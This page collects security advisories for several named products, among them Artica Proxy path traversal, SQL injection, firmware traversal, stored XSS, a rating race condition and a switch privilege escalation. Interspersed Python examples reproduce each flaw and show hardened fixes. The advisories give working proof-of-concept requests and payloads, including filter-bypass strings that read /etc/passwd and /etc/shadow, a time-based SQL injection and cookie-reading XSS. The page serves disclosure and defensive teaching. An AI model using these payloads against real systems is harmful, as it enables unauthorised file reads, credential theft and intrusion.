Unfortunately,<br /> the removal of the "../" string is only performed once, so<br /> the resulting file path is not re-checked. By using the path<br /> "..././foo.txt", the "images.listener.php" endpoint removes the<br /> "../" string, resulting in "../foo.txt", a relative file path<br /> that traverses to the parent directory.<br /><br /> The strings "/etc/" and "passwd" are also stripped from the file<br /> path as many methods of detecting a path traversal vulnerability<br /> rely on fetching the "/etc/passwd" file. 
By inserting these<br /> strings into specific locations, a user supplied "mailattach"<br /> value such as "/epasswdtc/ppasswdasswd" is transformed into<br /> "/etc/passwd", bypassing the protection entirely.<br /><br /> An unauthenticated user can leverage this endpoint to read<br /> files on the system, according to the privileges of the<br /> "www-data" user.<br /><br /><br />4. Mitigation and Remediation Recommendation<br /><br /> No response from vendor; no remediation available.<br /><br /><br />5. Credit<br /><br /> This vulnerability was discovered by Jaggar Henry of KoreLogic,<br /> Inc.<br /><br /><br />6. Disclosure Timeline<br /><br /> 2023.12.18 - KoreLogic requests vulnerability contact and<br /> secure communication method from Artica.<br /> 2023.12.18 - Artica Support issues automated ticket #1703011342<br /> promising follow-up from a human.<br /> 2024.01.10 - KoreLogic again requests vulnerability contact and<br /> secure communication method from Artica.<br /> 2024.01.10 - KoreLogic mail daemon receives SMTP 554 5.7.1 from<br /> mail.articatech.com with response<br /> "Client host rejected: Go Away!"<br /> 2024.01.11 - KoreLogic requests vulnerability contact and<br /> secure communication method via<br /> https://www.articatech.com/ 'Contact Us' web form.<br /> 2024.01.23 - KoreLogic requests CVE from MITRE.<br /> 2024.01.23 - MITRE issues automated ticket #1591692 promising<br /> follow-up from a human.<br /> 2024.02.01 - 30 business days have elapsed since KoreLogic<br /> attempted to contact the vendor.<br /> 2024.02.06 - KoreLogic requests update on CVE from MITRE.<br /> 2024.02.15 - KoreLogic requests update on CVE from MITRE.<br /> 2024.02.22 - KoreLogic reaches out to alternate CNA for<br /> CVE identifiers.<br /> 2024.02.26 - 45 business days have elapsed since KoreLogic<br /> attempted to contact the vendor.<br /> 2024.02.29 - Vulnerability details presented to AHA!<br /> (takeonme.org) by proxy.<br /> 2024.03.01 - AHA! 
issues CVE-2024-2053 to track this<br /> vulnerability.<br /> 2024.03.05 - KoreLogic public disclosure.<br /><br /><br />7. Proof of Concept<br /><br /> $ curl -k <br />'https://192.168.2.129:9000/images.listener.php?uri=1&mailattach=..././..././..././..././..././epasswdtc/ppasswdasswd'<br /> root:x:0:0:root:/root:/bin/bash<br /> daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin<br /> bin:x:2:2:bin:/bin:/usr/sbin/nologin<br /> sys:x:3:3:sys:/dev:/usr/sbin/nologin<br /> sync:x:4:65534:sync:/bin:/bin/sync<br /> games:x:5:60:games:/usr/games:/usr/sbin/nologin<br /> man:x:6:12:man:/var/cache/man:/usr/sbin/nologin<br /> lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin<br /> mail:x:8:8:mail:/var/mail:/usr/sbin/nologin<br /> news:x:9:9:news:/var/spool/news:/usr/sbin/nologin<br /> uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin<br /> proxy:x:13:13:proxy:/bin:/usr/sbin/nologin<br /> www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin<br /> backup:x:34:34:backup:/var/backups:/usr/sbin/nologin<br /> list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin<br /> irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin<br /> gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin<br /> nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin<br /> _apt:x:100:65534::/nonexistent:/usr/sbin/nologin<br /> systemd-timesync:x:101:102:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin<br /> systemd-network:x:102:103:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin<br /> systemd-resolve:x:103:104:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin<br /> messagebus:x:104:110::/nonexistent:/usr/sbin/nologin<br /> mysql:x:105:112:MySQL Server,,,:/nonexistent:/bin/false<br /> quagga:x:106:114:Quagga routing suite,,,:/run/quagga/:/usr/sbin/nologin<br /> apt-mirror:x:107:115::/var/spool/apt-mirror:/bin/sh<br /> privoxy:x:108:65534::/etc/privoxy:/usr/sbin/nologin<br /> ntp:x:109:117::/nonexistent:/usr/sbin/nologin<br /> 
redsocks:x:110:118::/var/run/redsocks:/usr/sbin/nologin<br /> prads:x:111:120::/home/prads:/usr/sbin/nologin<br /> freerad:x:112:121::/etc/freeradius:/usr/sbin/nologin<br /> vnstat:x:113:122:vnstat daemon,,,:/var/lib/vnstat:/usr/sbin/nologin<br /> stunnel4:x:114:123::/var/run/stunnel4:/usr/sbin/nologin<br /> sshd:x:115:65534::/run/sshd:/usr/sbin/nologin<br /> vde2-net:x:116:124::/var/run/vde2:/usr/sbin/nologin<br /> memcache:x:117:125:Memcached,,,:/nonexistent:/bin/false<br /> davfs2:x:118:126::/var/cache/davfs2:/usr/sbin/nologin<br /> ziproxy:x:119:127::/var/run/ziproxy:/usr/sbin/nologin<br /> proftpd:x:120:65534::/run/proftpd:/usr/sbin/nologin<br /> ftp:x:121:65534::/srv/ftp:/usr/sbin/nologin<br /> mosquitto:x:122:128::/var/lib/mosquitto:/usr/sbin/nologin<br /> openldap:x:123:129:OpenLDAP Server Account,,,:/var/lib/ldap:/bin/false<br /> munin:x:124:130:munin application user,,,:/var/lib/munin:/usr/sbin/nologin<br /> msmtp:x:125:131::/var/lib/msmtp:/usr/sbin/nologin<br /> Debian-snmp:x:126:132::/var/lib/snmp:/bin/false<br /> opendkim:x:127:133::/var/run/opendkim:/usr/sbin/nologin<br /> avahi:x:128:134:Avahi mDNS daemon,,,:/var/run/avahi-daemon:/usr/sbin/nologin<br /> glances:x:129:135::/var/lib/glances:/usr/sbin/nologin<br />ArticaStats:x:1000:1000:ArticaStats:/home/ArticaStats:/bin/bash<br /> Debian-exim:x:130:138::/var/spool/exim4:/usr/sbin/nologin<br /> smokeping:x:131:139:SmokePing daemon,,,:/var/lib/smokeping:/usr/sbin/nologin<br /> debian-spamd:x:132:140::/var/lib/spamassassin:/bin/sh<br /> netdata:x:1001:1002:netdata:/home/netdata:/bin/bash<br /> postfix:x:1002:1001::/home/postfix:/bin/sh<br /> ...<br /> ...<br /><br /><br />The contents of this advisory are copyright(c) 2024<br />KoreLogic, Inc. and are licensed under a Creative Commons<br />Attribution Share-Alike 4.0 (United States) License:<br />http://creativecommons.org/licenses/by-sa/4.0/<br /><br />Our public vulnerability disclosure policy is available at:<br />https://korelogic.com/KoreLogic-Public-Vulnerability-Disclosure-Policy.v2.3.txt<br /><br /></code></pre>
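<p>To make precise why the six str_replace() calls in section 3 fail, and what a check that cannot be rewritten around looks like, the following is an added example; it is not Artica's code and not KoreLogic's. It re-implements the filter in Python (str.replace makes the same single left-to-right pass as PHP's str_replace), runs the advisory's own "mailattach" values through it, and sets it beside a canonicalize-then-check function exercised against a temporary directory. The temporary directory and the file in it are constructed; the root path and the proof-of-concept value are the ones the advisory names.</p>

```python
import os
import posixpath
import tempfile

ATTACHMENTS_ROOT = "/opt/artica/share/www/attachments/"             # directory named in the advisory
POC_VALUE = "..././..././..././..././..././epasswdtc/ppasswdasswd"   # mailattach value from the PoC


def artica_filter(mailattach: str) -> str:
    """Python rendition of the six str_replace() calls in images.listener.php.
    str.replace, like PHP's str_replace, makes one left-to-right pass per pattern."""
    for old, new in (("////", "/"), ("///", "/"), ("//", "/"),
                     ("../", ""), ("/etc/", ""), ("passwd", "")):
        mailattach = mailattach.replace(old, new)
    return mailattach


def filtered_target(mailattach: str) -> str:
    """The path the original code ends up opening: filter, concatenate, normalize
    (purely lexical, no filesystem access)."""
    return posixpath.normpath(ATTACHMENTS_ROOT + artica_filter(mailattach))


def safe_attachment_path(root: str, mailattach: str):
    """Canonicalize first, then check containment. Returns the real path of an
    existing regular file under root, or None when the request must be refused.
    No rewriting of the input takes place, so there is nothing for a payload to
    reassemble itself from."""
    root_real = os.path.realpath(root)
    candidate = os.path.realpath(os.path.join(root_real, mailattach))
    if os.path.commonpath([root_real, candidate]) != root_real or candidate == root_real:
        return None
    if not os.path.isfile(candidate):
        return None
    return candidate


def demo() -> dict:
    """Run the advisory's inputs through both versions and collect what happens."""
    out = {
        "dotdot_slash": artica_filter("..././foo.txt"),          # advisory: becomes ../foo.txt
        "etc_passwd": artica_filter("/epasswdtc/ppasswdasswd"),  # advisory: becomes /etc/passwd
        "poc_filtered": artica_filter(POC_VALUE),
        "poc_target": filtered_target(POC_VALUE),
    }
    with tempfile.TemporaryDirectory() as tmp:
        root = os.path.join(tmp, "attachments")
        os.mkdir(root)
        with open(os.path.join(root, "ok.txt"), "w", encoding="utf-8") as fh:
            fh.write("constructed attachment\n")                  # constructed legitimate file
        expected = os.path.join(os.path.realpath(root), "ok.txt")
        out["safe_ok"] = safe_attachment_path(root, "ok.txt") == expected
        out["safe_poc"] = safe_attachment_path(root, POC_VALUE)
        out["safe_abs"] = safe_attachment_path(root, "/etc/passwd")
    return out


if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key:13} {value!r}")
```

<p>Two details worth noticing: "/epasswdtc/ppasswdasswd" on its own only reaches "attachments/etc/passwd" once the concatenation is normalized, which is why the proof of concept has to combine it with the "..././" prefix; and the hardened function never edits the input, so the filtered string that the original code builds simply does not exist. Denylist rewriting of paths is fragile by construction; resolving the path and comparing it with the real root is the check that holds.</p>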
<pre><code># Exploit Title: Customer Support System 1.0 - Multiple SQL injection vulnerabilities<br /># Date: 15/12/2023<br /># Exploit Author: Geraldo Alcantara<br /># Vendor Homepage:<br />https://www.sourcecodester.com/php/14587/customer-support-system-using-phpmysqli-source-code.html<br /># Software Link:<br />https://www.sourcecodester.com/download-code?nid=14587&title=Customer+Support+System+using+PHP%2FMySQLi+with+Source+Code<br /># Version: 1.0<br /># Tested on: Windows<br /># CVE : CVE-2023-50071<br /><br />*Description*: Multiple SQL injection vulnerabilities in<br />/customer_support/ajax.php?action=save_ticket in Customer Support<br />System 1.0 allow authenticated attackers to execute arbitrary SQL<br />commands via department_id, customer_id and subject.<br /><br />*Payload*:<br />'+(select*from(select(sleep(20)))a)+'<br /><br />*Steps to reproduce*:<br /><br />1- Log in to the application.<br /><br />2- Navigate to the page /customer_support/index.php?page=new_ticket.<br /><br />3- Create a new ticket and insert a malicious payload into one of the<br />following parameters: department_id, customer_id, or subject.<br /><br />*Request:*<br />POST /customer_support/ajax.php?action=save_ticket HTTP/1.1<br />Host: localhost<br />User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0)<br />Gecko/20100101 Firefox/120.0<br />Accept: */*<br />Accept-Language: pt-BR,pt;q=0.8,en-US;q=0.5,en;q=0.3<br />Accept-Encoding: gzip, deflate, br<br />X-Requested-With: XMLHttpRequest<br />Content-Type: multipart/form-data;<br />boundary=---------------------------81419250823331111993422505835<br />Content-Length: 853<br />Origin: http://192.168.68.148<br />Connection: close<br />Referer: http://192.168.68.148/customer_support/index.php?page=new_ticket<br />Cookie: csrftoken=1hWW6JE5vLFhJv2y8LwgL3WNPbPJ3J2WAX9F2U0Fd5H5t6DSztkJWD4nWFrbF8ko;<br />sessionid=xrn1sshbol1vipddxsijmgkdp2q4qdgq;<br />PHPSESSID=mfd30tu0h0s43s7kdjb74fcu0l<br /><br 
/>-----------------------------81419250823331111993422505835<br />Content-Disposition: form-data; name="id"<br /><br /><br />-----------------------------81419250823331111993422505835<br />Content-Disposition: form-data; name="subject"<br /><br />teste'+(select*from(select(sleep(5)))a)+'<br />-----------------------------81419250823331111993422505835<br />Content-Disposition: form-data; name="customer_id"<br /><br />3<br />-----------------------------81419250823331111993422505835<br />Content-Disposition: form-data; name="department_id"<br /><br />4<br />-----------------------------81419250823331111993422505835<br />Content-Disposition: form-data; name="description"<br /><br /><p>Blahs<br></p><br />-----------------------------81419250823331111993422505835<br />Content-Disposition: form-data; name="files"; filename=""<br />Content-Type: application/octet-stream<br /><br /><br />-----------------------------81419250823331111993422505835--<br /><br /></code></pre>
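The root cause behind the save_ticket advisory above is that form fields end up inside the SQL text. The following is an added example, not the application's PHP source (which is not on this page): a hypothetical model of the insert in its concatenated and its parameterised form, using SQLite in memory so it runs offline, with the advisory's "subject" payload as input.

```python
import sqlite3

# Payload quoted from the advisory above (the "subject" field of the request).
PAYLOAD = "teste'+(select*from(select(sleep(5)))a)+'"

def make_db():
    # In-memory stand-in for the application's database (constructed for this example).
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE tickets (id INTEGER PRIMARY KEY, subject TEXT, "
                 "customer_id TEXT, department_id TEXT)")
    return conn

def save_ticket_unsafe(conn, subject, customer_id, department_id):
    # Hypothetical model of the bug: form fields pasted into the SQL text, so a
    # single quote in "subject" ends the string literal and the rest is parsed as SQL.
    sql = ("INSERT INTO tickets (subject, customer_id, department_id) "
           "VALUES ('%s', '%s', '%s')" % (subject, customer_id, department_id))
    conn.execute(sql)
    conn.commit()

def save_ticket_safe(conn, subject, customer_id, department_id):
    # Hardened form: bound parameters travel separately from the SQL text, so the
    # payload is stored as an ordinary string no matter which characters it contains.
    conn.execute("INSERT INTO tickets (subject, customer_id, department_id) VALUES (?, ?, ?)",
                 (subject, customer_id, department_id))
    conn.commit()

def payload_reaches_sql_parser(save_fn, subject=PAYLOAD):
    """True if save_fn lets the payload alter the statement instead of storing it verbatim.

    SQLite has no sleep() function, so if the injected subquery is parsed as SQL the
    statement fails to prepare; if it is bound as data, the row holds the exact payload.
    """
    conn = make_db()
    try:
        save_fn(conn, subject, "3", "4")
    except sqlite3.OperationalError:
        return True
    stored = conn.execute("SELECT subject FROM tickets").fetchone()[0]
    return stored != subject

if __name__ == "__main__":
    print("concatenation:", payload_reaches_sql_parser(save_ticket_unsafe))  # True
    print("bound params :", payload_reaches_sql_parser(save_ticket_safe))    # False
```

On MySQL the same concatenated statement would evaluate sleep() and stall the request, which is how the advisory detects the injection; the bound-parameter form stores the text and never evaluates it.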
<pre><code># Exploit Title: Path traversal in RAD SecFlow-2 devices with Firmware 4.1.01.63<br /># Date: 3/2024<br /># CVE: CVE-2019-6268<br /># Exploit Author: Branko Milicevic<br /><br />RAD SecFlow-2 devices with Hardware 0202, Firmware 4.1.01.63, and U-Boot 2010.12 allow URIs beginning with /.. for Directory Traversal, as demonstrated by reading /etc/shadow.<br /><br />Steps to reproduce:<br /><br />Request:<br />GET /../../../../../../../../../../etc/shadow HTTP/1.1<br /><br />Response:<br />HTTP/1.1 200 OK<br /><br />root:nDnjJ****ydh3:11851:0:99999:7:::<br />bin:*:11851:0:99999:7:::<br />daemon:*:11851:0:99999:7:::<br />adm:*:11851:0:99999:7:::<br />lp:*:11851:0:99999:7:::<br />sync:*:11851:0:99999:7:::<br />shutdown:*:11851:0:99999:7:::<br /><br />Vulnerability Type<br />Directory Traversal<br /><br />Attack Vectors<br />An unauthorized attacker can create a crafted request to obtain any file from the operating system (password hashes).<br /><br />Reference<br />https://www.owasp.org/index.php/Path_Traversal<br /></code></pre>
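A web server that serves whatever path the request names, as the SecFlow-2 firmware does above, is missing the step of anchoring the path under its document root before touching the filesystem. The following is an added example, not the device's code: a request-path resolver that refuses anything escaping an assumed web root (the value of WEB_ROOT is a placeholder), plus a detector that flags such URIs in a set of constructed request lines modelled on the advisory.

```python
import posixpath
from urllib.parse import unquote

WEB_ROOT = "/var/www"  # assumed document root; the device's real web root is not on the page

def resolve_request_path(uri, web_root=WEB_ROOT):
    """Map a request URI to a filesystem path under web_root, or None if it escapes it."""
    path = unquote(uri.split("?", 1)[0])        # strip query string, decode %2e%2e etc.
    if "\x00" in path:                          # NUL would truncate the path in C string APIs
        return None
    # Anchor at the web root first, then collapse "." and ".." segments; a leading ".."
    # run such as the advisory's /../../../../etc/shadow then resolves to /etc/shadow,
    # which the prefix check below rejects instead of serving.
    candidate = posixpath.normpath(posixpath.join(web_root, path.lstrip("/")))
    if candidate != web_root and not candidate.startswith(web_root.rstrip("/") + "/"):
        return None
    return candidate

# Constructed request lines modelled on the advisory (not a real device log).
SAMPLE_REQUESTS = [
    "GET /../../../../../../../../../../etc/shadow HTTP/1.1",
    "GET /index.html HTTP/1.1",
    "GET /%2e%2e/%2e%2e/etc/passwd HTTP/1.1",
    "GET /css/../img/logo.png HTTP/1.1",
]

def flag_traversal(request_lines, web_root=WEB_ROOT):
    """Return the URIs from request_lines that would resolve outside web_root."""
    flagged = []
    for line in request_lines:
        parts = line.split()
        if len(parts) < 2:
            continue
        if resolve_request_path(parts[1], web_root) is None:
            flagged.append(parts[1])
    return flagged

if __name__ == "__main__":
    for uri in flag_traversal(SAMPLE_REQUESTS):
        print("traversal attempt:", uri)
```

Note that "/css/../img/logo.png" is accepted: the check is on where the normalised path lands, not on the mere presence of "..", so legitimate relative references are not rejected.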
<pre><code># Exploit Title: Stored XSS in Solar-Log 200 3.6.0 web panel<br /># Date: 10-30-23<br /># Exploit Author: Vincent McRae, Mesut Cetin - Redteamer IT Security<br /># Vendor Homepage: https://www.solar-log.com/en/<br /># Version: Solar-Log 200 PM+ 3.6.0 Build 99 - 15.10.2019<br /># Tested on: Proprietary devices: https://www.solar-log.com/en/support/firmware/<br /># CVE: CVE-2023-46344<br /><br /># POC:<br /><br />1. Go to solar panel<br />2. Go to configuration -> Smart Energy -> "drag & drop" button.<br />3. Change "name" to: &lt;xss onmouseenter="alert(document.cookie)" style=display:block&gt;test&lt;/xss&gt;<br />4. Once you hover over "test", you get XSS -> if a higher-privileged user hovers over it, we can get their cookies.<br /><br /></code></pre>
<pre><code># Exploit Title: Wordpress Plugin Neon Text &lt;= 1.1 - Stored Cross Site Scripting (XSS)<br /># Date: 2023-11-15<br /># Exploit Author: Eren Car<br /># Vendor Homepage: https://www.eralion.com/<br /># Software Link: https://downloads.wordpress.org/plugin/neon-text.zip<br /># Category: Web Application<br /># Version: 1.0<br /># Tested on: Debian / WordPress 6.4.1<br /># CVE : CVE-2023-5817<br /><br /># 1. Description:<br />The Neon text plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's neontext_box shortcode in 1.1 and above versions.<br /><br /># 2. Proof of Concept (PoC):<br /> a. Install and activate version 1.0 of the plugin.<br /> b. Go to the posts page and create a new post.<br /> c. Add a shortcode block and insert the following payload:<br /><br /> [neontext_box][neontext color='"onmouseover="alert(document.domain)"']TEST[/neontext][/neontext_box]<br /><br /> d. Save the changes and preview the page. A popup window demonstrating the vulnerability will be executed.<br /><br /></code></pre>
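The two stored-XSS advisories above (Solar-Log "name" field and the Neon Text color attribute) fail in two different output contexts: a text node and an HTML attribute. The following is an added example, not either product's code: hypothetical models of each renderer in raw and hardened form, using the payloads quoted in the advisories, plus a small HTML-parser check that reports any event-handler attribute the template itself never wrote.

```python
import html
import re
from html.parser import HTMLParser

# Payloads quoted from the two advisories above.
NEON_COLOR = '"onmouseover="alert(document.domain)"'
SOLARLOG_NAME = '<xss onmouseenter="alert(document.cookie)" style=display:block>test</xss>'

# Allowlist for a colour value: hex triplet/sextet or a plain CSS colour keyword.
CSS_COLOR = re.compile(r"^(#[0-9a-fA-F]{3}([0-9a-fA-F]{3})?|[a-zA-Z]{1,20})$")

def render_neon_unsafe(color, text):
    # Hypothetical model of the vulnerable shortcode: attribute value interpolated raw,
    # so a double quote in "color" closes style="..." and starts a new attribute.
    return '<span style="color: %s">%s</span>' % (color, text)

def render_neon_safe(color, text, fallback="#ffffff"):
    # Validate the colour against the allowlist, then entity-encode both contexts.
    if not CSS_COLOR.match(color):
        color = fallback
    return '<span style="color: %s">%s</span>' % (html.escape(color, quote=True),
                                                  html.escape(text))

def render_name_unsafe(name):
    # Hypothetical model of the panel's list view echoing the stored name unescaped.
    return "<td>%s</td>" % name

def render_name_safe(name):
    # Text-node context: entity-encoding is sufficient here.
    return "<td>%s</td>" % html.escape(name, quote=True)

class _HandlerFinder(HTMLParser):
    """Collects on* attributes from every start tag in a fragment."""
    def __init__(self):
        super().__init__()
        self.handlers = []

    def handle_starttag(self, tag, attrs):
        self.handlers += [name for name, _ in attrs if name.startswith("on")]

def injected_handlers(markup):
    """Event-handler attribute names found in markup; a clean render returns []."""
    finder = _HandlerFinder()
    finder.feed(markup)
    return finder.handlers

if __name__ == "__main__":
    print(injected_handlers(render_neon_unsafe(NEON_COLOR, "TEST")))   # ['onmouseover']
    print(injected_handlers(render_name_safe(SOLARLOG_NAME)))          # []
```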
<pre><code># Exploit Title: kk Star Ratings &lt; 5.4.6 - Rating Tampering via Race Condition<br /># Google Dork: inurl:/wp-content/plugins/kk-star-ratings/<br /># Date: 2023-11-06<br /># Exploit Author: Mohammad Reza Omrani<br /># Vendor Homepage: https://github.com/kamalkhan<br /># Software Link: https://wordpress.org/plugins/kk-star-ratings/<br /># WPScan : https://wpscan.com/vulnerability/6f481d34-6feb-4af2-914c-1f3288f69207/<br /># Version: 5.4.6<br /># Tested on: Wordpress 6.2.2<br /># CVE : CVE-2023-4642<br /><br /># POC:<br />1- Install and activate kk Star Ratings.<br />2- Go to the page that displays the star rating.<br />3- Using Burp and the Turbo Intruder extension, intercept the rating submission.<br />4- Send the request to Turbo Intruder using Action > Extensions > Turbo Intruder > Send to turbo intruder.<br />5- Drop the initial request and turn Intercept off.<br />6- In the Turbo Intruder window, add "%s" to the end of the connection header (e.g. "Connection: close %s").<br />7- Use the code `examples/race.py`.<br />8- Click "Attack" at the bottom of the window. This will send multiple requests to the server at the same moment.<br />9- To see the updated total rates, reload the page you tested.<br /><br /></code></pre>
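The rating-tampering advisory above works because a "has this visitor already rated?" check and the write that records the vote are separate steps, so requests that land together all pass the check. The following is an added example, not the plugin's code: a constructed in-memory model of that one-vote rule in its check-then-act form and in an atomic form, with a barrier standing in for the simultaneous requests so the outcome is deterministic.

```python
import threading

class RatingStore:
    """Constructed model of a 'one vote per visitor' rule; not the plugin's own code."""

    def __init__(self):
        self.voted = set()      # visitors who have already rated
        self.ballots = []       # stars recorded, one entry per accepted vote
        self.lock = threading.Lock()

    def vote_check_then_act(self, visitor, stars, gate=None):
        # Racy: the "already voted?" check and the write are separate steps, so
        # requests that arrive together all pass the check before any of them writes.
        if visitor in self.voted:
            return False
        if gate is not None:
            gate.wait()          # models the requests landing at the same instant
        self.voted.add(visitor)
        self.ballots.append(stars)
        return True

    def vote_atomic(self, visitor, stars, gate=None):
        # Fixed: check and write form one critical section. Server-side the same
        # guarantee comes from a UNIQUE(post_id, visitor) constraint or an atomic upsert.
        if gate is not None:
            gate.wait()
        with self.lock:
            if visitor in self.voted:
                return False
            self.voted.add(visitor)
            self.ballots.append(stars)
            return True

def burst(method_name, requests=20, stars=5):
    """Fire `requests` identical votes from one visitor at once; return the total recorded."""
    store = RatingStore()
    gate = threading.Barrier(requests)
    threads = [threading.Thread(target=getattr(store, method_name),
                                args=("visitor-1", stars, gate)) for _ in range(requests)]
    for t in threads:
        t.start()
    for t in threads:
        t.join()
    return sum(store.ballots)

if __name__ == "__main__":
    print("check-then-act total:", burst("vote_check_then_act"))  # 100
    print("atomic total        :", burst("vote_atomic"))          # 5
```

The only difference between the two methods is whether the check and the write can be interleaved; a lock in a single process, or a database uniqueness constraint for a PHP application that handles each request in its own process, closes the window.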
<pre><code>[+] Credits: Shahnawaz Shaikh, Security Researcher at Cybergate Defense LLC<br />[+] twitter.com/_striv3r_<br /><br />[Vendor]<br />Tp-Link (http://tp-link.com)<br /><br /><br />[Product]<br />JetStream Smart Switch - TL-SG2210P v5.0 Build 20211201<br /><br /><br />[Vulnerability Type]<br />Improper Access Control<br /><br /><br />[Affected Product Code Base]<br />JetStream Smart Switch - TL-SG2210P v5.0 Build 20211201<br /><br /><br />[Affected Component]<br />usermanagement, swtmactablecfg endpoints of webconsole<br /><br /><br />[CVE Reference]<br />CVE-2023-43318<br /><br /><br />[Security Issue]<br />TP-Link JetStream Smart Switch TL-SG2210P 5.0 Build 20211201 allows attackers to escalate privileges via modification of the 'tid' and 'usrlvl' values in GET requests.<br /><br /><br />[Exploit/POC]<br />N/A<br /><br /><br />[Network Access]<br />Remote<br /><br /><br />[Severity]<br />High<br /><br /><br />[Disclosure Timeline]<br />Vendor Notification: September 12, 2023<br />Vendor released fixed firmware TL-SG2210P(UN)_V5.20_5.20.1 Build 20240202: February 29, 2024<br />March 1, 2024 : Public Disclosure<br /><br /></code></pre>